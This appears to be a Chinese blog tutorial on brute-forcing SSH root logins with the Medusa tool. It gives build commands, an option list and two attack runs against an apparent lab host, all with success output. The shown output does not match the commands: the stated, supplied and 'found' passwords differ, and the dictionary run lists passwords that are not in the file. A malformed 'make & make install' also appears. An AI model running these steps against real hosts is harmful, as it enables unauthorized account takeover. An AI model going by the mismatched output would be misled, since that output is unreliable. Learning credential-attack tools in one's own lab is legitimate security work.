Medusa(美杜莎)-sshd暴力破解

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具


官方网站:http://foofus.net/goons/jmk/medusa/medusa.html

#安装medusa ,手动编译和安装medusa

yum install libssh2-devel libssh2-devel -y
tar -zxvf medusa-2.2.tar.gz
cd medusa-2.2

#这个参数中加入很多模块,这样方便后期使用。--enable-module-ssh=yes这个就是稍后要使用的暴力破解sshd服务的模块

./configure --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes

 #安装完成后,会将medusa的一些modules 文件复制到/usr/local/lib/medusa/modules文件夹

make & make install

Medusa参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT]      目标主机名称或者IP地址
-H [FILE]       包含目标主机名称或者IP地址文件
-u [TEXT]      测试的用户名
-U [FILE]       包含测试的用户名文件
-p [TEXT]      测试的密码
-P [FILE]       包含测试的密码文件
-C [FILE]       组合条目文件
-O [FILE]       日志信息文件
-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同
-M [TEXT]      模块执行名称
-m [TEXT]      传递参数到模块
-d                 显示所有的模块名称
-n [NUM]       使用非默认Tcp端口
-s                 启用SSL
-r [NUM]       重试间隔时间,默认为3秒
-t [NUM]       设定线程数量
-T             同时测试的主机总数
-L                 并行化,每个用户使用一个线程
-f                 在任何主机上找到第一个账号/密码后,停止破解
-F                在任何主机上找到第一个有效的用户名/密码后停止审计。
-q                显示模块的使用信息
-v [NUM]      详细级别(0-6-w [NUM]     错误调试级别(0-10-V                显示版本
-Z [TEXT]      继续扫描上一次

#例1:通过文件来指定host和user,host.txt为目标主机名称或者IP地址,user.txt指定需要暴力破解的用户名,密码指定为123456。

echo 192.168.142.31 > /root/host.txt
echo root > /root/users.txt

#可以看到暴解成功。

medusa -M ssh -H ./host.txt -U ./users.txt -p Yangke@1124

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.142.31 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: Yangke@1124 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.142.31 User: root Password: admin@110 [SUCCESS]

#可以自己生成一个密码字典去进行暴力破解,写入以下内容,每行一个密码,做一个临时字典

vim /root/p.txt
123
abc123
123456
666666
admin@110

注:其中admin@110是我们的密码

#使用密码字典去暴力破解,-t 8代表8个线程一起去进行

medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O /root/ssh.log -t 8

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.142.31 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: admin@110 (1 of 7 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.142.31 User: root Password: admin@110 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.142.31 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 213154 (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.142.31 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 1234 (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.142.31 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 12415 (4 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.142.31 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 12312 (5 of 7 complete)

#提示SUCCESS暴力破解成功!

posted @ 2022-08-29 11:10  Memory-  阅读(986)  评论(0)    收藏  举报